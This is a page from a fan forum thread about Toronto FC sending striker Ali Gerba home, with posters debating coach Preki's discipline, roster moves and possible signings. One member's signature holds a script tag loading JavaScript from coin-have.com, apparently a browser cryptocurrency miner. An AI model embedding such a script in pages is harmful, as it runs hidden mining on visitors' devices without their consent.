Page 7 of 18 FirstFirst ... 3456789101117 ... LastLast

Thread: Gerba sent home

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Blizzard View Post
    I still expect to see Dickov in a TFC shirt as well.
    Sadly, he'd fit in with a few of our striking purchases.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Nuvinho View Post
    With a count of 12 to 1 (since that's how many healthy bodies we have left).......Garcia you are voted off the island.
    Garcia will not be voted off the island. I have him in my office pool to win the million, no skills and brings nothing to the tribe, BUT he plays a great social game.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC_Niagara View Post
    This is the most rediculous comment I think I have ever heard. We've played 3 or 4 pre-season games! How does it make sense to send a player home for not playing well for a spell? There is definitely something else going on. That comment makes no sense whatsoever.
    Agreed completely.

As someone else pointed out, you're sending a guy home who "worked hard" but is on a guaranteed deal? So now what, we pay half that 175k and he goes to San Jose to play for Yallop?

This club doesn't even wait two days to come out with more dumbfounding moves.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ag futbol View Post
    Agreed completely.

As someone else pointed out, you're sending a guy home who "worked hard" but is on a guaranteed deal? So now what, we pay half that 175k and he goes to San Jose to play for Yallop?

This club doesn't even wait two days to come out with more dumbfounding moves.
    Preki at work. I'm starting to understand why so many Chivas fans were happy to see him go.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I still expect to see Dickov in a TFC shirt as well.
    sadly I think yer right. Mo will bring in a 37 year old, who takes advantage of holidays with TFC in the winter, and couldn't give a crap about Toronto or he'd be here already, and he'll come in the middle of our season for a final paycheque after a long career..
    Fail to prepare, prepare to fail.
    Roy Keane

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by anto7 View Post
    John, that is not what I am asking. I understand that is the reason given for sending him home, my question is what are they trying to accomplish by doing this? What exactly is their intent by sending him home?
    Not sure if you got an answer to this or not but without this piece of the puzzle it is all very confusing.
    With respect.
    I didn't really get an answer to that, but my sense is that in doing this they wanted to send Gerba a message that he has to do better.
    john

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by sully View Post
    sadly I think yer right. Mo will bring in a 37 year old, who takes advantage of holidays with TFC in the winter, and couldn't give a crap about Toronto or he'd be here already, and he'll come in the middle of our season for a final paycheque after a long career..
    Possibly and while this may not be saying much, everything I've heard about his brief game time with us this spring says he was the best red on the field and that includes JDG!

I think he still has something to offer us.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Possibly and while this may not be saying much, everything I've heard about his brief game time with us this spring says he was the best red on the field and that includes JDG!

I'm sure you're probably right. But for me it's as, or even more, important that a player want to be here. And to be building a team well into the season is just irritating to me..
    Fail to prepare, prepare to fail.
    Roy Keane

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Preki at work. I'm starting to understand why so many Chivas fans were happy to see him go.
    Well i'm half way on this. I don't know if Preki is right or wrong, but if this is the way he wants to run his team i think he should be given the opportunity. We should have considered this type of thing before we hired him as our coach though.

The moves we made a year ago compared to now... shocking lack of foresight.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

it's not surprising to see a new coach dump players. DC United did that too.. but usually it's a completely new regime, which makes this unusual, considering Preki is basically ending or making problems for deals Mo signed recently.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ag futbol View Post
    Well i'm half way on this. I don't know if Preki is right or wrong, but if this is the way he wants to run his team i think he should be given the opportunity. We should have considered this type of thing before we hired him as our coach though.

The moves we made a year ago compared to now... shocking lack of foresight.
    yeah i kinda agree, especially when we dont have any immediate replacements, thats worrisome when the squad is particularly lacking...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I am actually looking forward to seeing what Gerba will bring to the squad this season... he was dissapointing at best last season, especially after making eveyone excited with his preformance at the gold cup... and then lacking everything once he joined TFC.... anyways i might be one of the few people here that hopes he stays

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Ya the whole thing just reminds me of my beloved Liverpool letting important/quality pieces go and replacing them with lower quality or not replacing them at all.

Makes no sense to me unless there is a plan but what plan could that be with the season set to start soon if all goes to plan and you have a team that is still tryna get to know each other.

Quote Originally Posted by Nuvinho View Post
    OUT:

Fellinga
    Guevara
    Vitti
    Robbo
    Serioux
    Gerba?

IN:

Peterson
    Harden

Very nice!!!

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Default Perhaps, they tried the carrot. Now it's time for the stick.

Quote Originally Posted by johnmolinaro View Post
    I didn't really get an answer to that, but my sense is that in doing this they wanted to send Gerba a message that he has to do better.
    john
    Makes sense. Just as Ensco and few others see it. It's an attempt to motivate a change in behaviour when other, more traditional, methods have failed. Athletes need to play to be considered relevant.
    "Failure simply isn't an option at this stage. TFC pushed its chips to the middle of the table when it splurged on Bradley and Defoe and reinforced its bet by making savvy acquisitions elsewhere. This collection of players is capable of delivering on the promises made during the close season. There are no more excuses available for TFC. Only success will continue the process of atoning for the past and establishing a higher standard for the future." FOX Sports

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Derko View Post
    I don't know about Ali Gerba, he is supposed to be a goal poacher, pick up the scraps and score
    We don't get nearly enough quality chances for there to be any poaching oppurtunities. Just the wrong player for us.

Really a team has not been built rather it is just a mash of guys thrown together.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Big Bruva View Post
    Ya the whole thing just reminds me of my beloved Liverpool letting important/quality pieces go and replacing them with lower quality or not replacing them at all.

Makes no sense to me unless there is a plan but what plan could that be with the season set to start soon if all goes to plan and you have a team that is still tryna get to know each other.
    That's probably the first and last time our team will ever be compared to Liverpool in any kind of way lol

Wouldn't it be nice to walk into training camp with 90% of the roster settled, just invite a few trialists in to see if they can make an impact and spend the whole preseason coming together as a team and building chemistry?

The season starts in less than a couple of weeks and we don't even know who's going to be playing for us or where on the pitch the guys that we have will be playing.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Some people here need to calm down a little.

I agree with Rudi, this is 100% Preki, nothing to do with Mo.

We knew when Preki was coming in that he is a disciplinarian. If Gerba gave anything less than 100% (and it sounded like he didn't), Preki would punish him. This will strike fear into the hearts of the other players, who are used to "the fans love us, we don't need to work too hard" mentality. This is the new regime, and Gerba's been made the example. I expect the players to work really hard on Wednesday and get the win. I'm 100% behind this.

Also, as far as changes on the team, we have a couple of good-looking trialists. The cupboard is not bare. Again, Preki will be looking at attitude, not just ability.

This is great news. In the past, TFC has been built in Football Manager fantasy team style with no regard to how the pieces fit together. Everyone knows that it's not just individual ability that counts, it's team chemistry. Preki is all about team chemistry. (For an example of a team that just chock-filled with great players, but poor chemistry, just look at Real Madrid, either currently, or in the Galacticos era). Seeing Preki take the reigns like this gives me some hope. Certainly, after the last Saturday, the team needed a boot on the backside to get going and get themselves in order.

Also, people are acting shocked that a new coach is actually making changes. Everyone, this is normal. Remember that this is the first opportunity that Preki has had to really assess his squad. I'd rather have a short-squad that plays for each other than a full squad of lazy players.
    MLS is a tough, physical league, that emphasizes speed, and features plastic fields, grueling travel, extreme weather, and incompetent refs. - NK Toronto

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

He's making guaranteed money this year, so I think TFC is sending a message that he's available for a natural 4th rounder. We're going to own that round in the draft next year

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Folks, I'm as critical of Mo as most (if not more), but stop for second and think about Gerba here. Despite a decent scoring rate the guy has jumped from club to club - 14 in 9 years. Rumors abound time and time again that it's due to laziness, he doesn't apply himself in training, and has a poor attitude.

Maybe there was good reason to send him packing.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Dickov signed with Leeds - he's not coming.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

He's signed with Leeds until the end of this FL1 season, and could come over in the summer.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Oldtimer View Post
    I'd rather have a short-squad that plays for each other than a full squad of lazy players.
    I agree completely. I will put up with a lot if I can see a player working hard (Barrett) but Gerba was bone idle.

My opinion of Preki has risen with this move. I was concerned about his less than honest quotes related to Robbo's departure but if he is prepared to sit down a player who's contract they can't get rid of then maybe he is the right man for this job.

I think it will take a few weeks of the season for the team to take shape but at least we know that the players will work hard or they'll be out.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

gonna go with brad and OldTimer here and say this one isn't on Mo, its Preki's move and its not necessarily a bad move.

Sometime a move like this is the kick in the pants a player needs.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by KRO View Post
    I agree completely. I will put up with a lot if I can see a player working hard (Barrett) but Gerba was bone idle.

My opinion of Preki has risen with this move. I was concerned about his less than honest quotes related to Robbo's departure but if he is prepared to sit down a player who's contract they can't get rid of then maybe he is the right man for this job.

I think it will take a few weeks of the season for the team to take shape but at least we know that the players will work hard or they'll be out.
    Just had a thought after reading this post. Perhaps they made this move to take the heat off the Robinson fiasco?(just kidding) although I must say I did forget about that particular mess for a few hours whilst we were all shaking our heads at this latest incident.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

we all sort of knew that preki was that hard ass who demanded the best from his players. It should be no shock to us who thought gerba was lazy that something like this would happen
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by johnmolinaro View Post
    john
    If that is the case I'm down with that.
    Thanks John

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

He was sent home cause he is FAT period no other reason....

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

LOL he's not fat though. He's big no doubt, but physically it seems Ali is in probably the best shape of his career right now.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Oldtimer View Post
    Some people here need to calm down a little.

I agree with Rudi, this is 100% Preki, nothing to do with Mo.

We knew when Preki was coming in that he is a disciplinarian. If Gerba gave anything less than 100% (and it sounded like he didn't), Preki would punish him. This will strike fear into the hearts of the other players, who are used to "the fans love us, we don't need to work too hard" mentality. This is the new regime, and Gerba's been made the example. I expect the players to work really hard on Wednesday and get the win. I'm 100% behind this.

Also, as far as changes on the team, we have a couple of good-looking trialists. The cupboard is not bare. Again, Preki will be looking at attitude, not just ability.

This is great news. In the past, TFC has been built in Football Manager fantasy team style with no regard to how the pieces fit together. Everyone knows that it's not just individual ability that counts, it's team chemistry. Preki is all about team chemistry. (For an example of a team that just chock-filled with great players, but poor chemistry, just look at Real Madrid, either currently, or in the Galacticos era). Seeing Preki take the reigns like this gives me some hope. Certainly, after the last Saturday, the team needed a boot on the backside to get going and get themselves in order.

Also, people are acting shocked that a new coach is actually making changes. Everyone, this is normal. Remember that this is the first opportunity that Preki has had to really assess his squad. I'd rather have a short-squad that plays for each other than a full squad of lazy players.
    Agreed. Last year there were many supporters calling for a disciplinarian type of coach in contrast to the complacent style of Cummins in order to motivate the team to overachieve on the pitch. Preki has made his point and I hope the rest of the players respond accordingly...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by CretanBull View Post
    He's signed with Leeds until the end of this FL1 season, and could come over in the summer.
    With due respect mate, by the time Dickov allegedly comes over we may be so far behind the eight ball that it may be too little too late. Where are our goals going to come from???

Unless yet another revolving striker comes in soon, and if Gerba is not part of the plan, then we are reliant on OBW and Chad Barrett for our goals. Both of them may surprise this season, and for our sake lets hope that they do surprise, but that is definitely not guaranteed to happen. And we have not had much success with mid season signings in the past (Laurent Robert anyone???).

I personally think that Dickov has the talent to be an ideal striker in a league like MLS, but relying on the appearance of a guy that has already turned us down twice as a saviour that may only make an appearance halfway into our season is another in the long line of gambles TFC has made. It may come right but we have had next to no luck with this kind of move in the past three seasons.